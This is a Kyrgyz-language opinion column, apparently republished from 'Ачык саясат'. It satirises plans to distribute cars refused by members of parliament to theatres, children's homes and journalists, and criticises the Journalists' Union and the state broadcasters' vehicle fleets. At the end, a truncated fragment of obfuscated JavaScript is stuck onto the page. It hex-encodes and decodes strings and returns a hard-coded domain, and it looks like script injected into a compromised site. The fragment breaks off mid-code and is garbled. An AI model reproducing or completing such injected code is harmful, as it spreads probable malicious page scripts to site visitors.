Жогорку Кеңештин депутаттары баш тарткан автоунааларга көз арткандар көп болууда. Маданият министрлиги “театрларга берели, маданият жылында эл кыдырып спектакль, концерт коюшсун” деген сунуш айтты. 5 артист баткан машине менен кайсы спектакль же концерт коюлат? Театр гастролго чыкса декорациясы, кийимдери, аспаптары, жарык бергичтерине бир машина, артисттер бир автобус болуп чыгып жүрүшөт. Депутаттын машинесинде директору чалкалап, алдында жүрсүн дешкени го.
Балдар үйлөрүнөн арыз түшүптүр дешет. Ал жакка чарба иштерине зарыл же 10-15 баланы салып, оюн-зоок, цирк, концертке алпарчу кичинекей автобустар ыңгайлуу. Депутаттын машинеси ал жерде деле деректиринен артпайт. “Эжеси эрге тийсе сиңдисине көйнөгү артчы” эле. “Жогорку Кеңештин арткан машинелерин төртүнчү бийликтин өкүлдөрүнө бергиле” деп журналисттердин таламын талашкан “Журналисттер Союзу” деген уюм балык болуп үн катпайт. Төрагамын деп төш каккан А.Султанбаев дал ошол ЖоКеде иштейт имиш. Спикерге кирип, бул көйгөйдү көтөрмөккө ага жүрөк керек. Бир сүйлөмм айтканча буту титиреп, эки сүйлөм айтканча эриндери эпке келбей калаар.
Көйгөйдү көтөрсө Жанар, Рыскелди, Лунара, Жылдыз деген журналисттер гана көтөрүшү мүмкүн. Анткени алар убагында жөө-жалаңдап, эл кыдырып жүргөн журналисттер.
Билишибизче КТРКда 60 тай машине бар. Алардын журналисттери ат минип жургөндөй болсо, ЭлТРдин журналисттери эшек минип жургөндөй өтө жармач абалда. Эскилиги жетип, ичеги-карыны, өпкө- журөгү араң эле кышылдаган 11 гана машинеси бар. Көрсөтүулөрү Кудайга шүгүр, “кара жащикке” караганда элге көрүмдүү.
“Эркин гезит же телеге да бирден машине бериш керек, алар Кытайдын көйгөйүн жазып жатыптырбы” деп машине бөлүштүрүүчү комиссиядан бирөө-жарымы айтып чыгалышпайт ко? Антсе күн батыштан чыкпайбы. Аларга да бир-эки машине бердиртиш үчүн Асылбекте эмес, Алмазбекте жүрөк болуш керек.
Булак: “Ачык саясат”
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

КОММЕНТАРИЙ КАЛТЫРУУ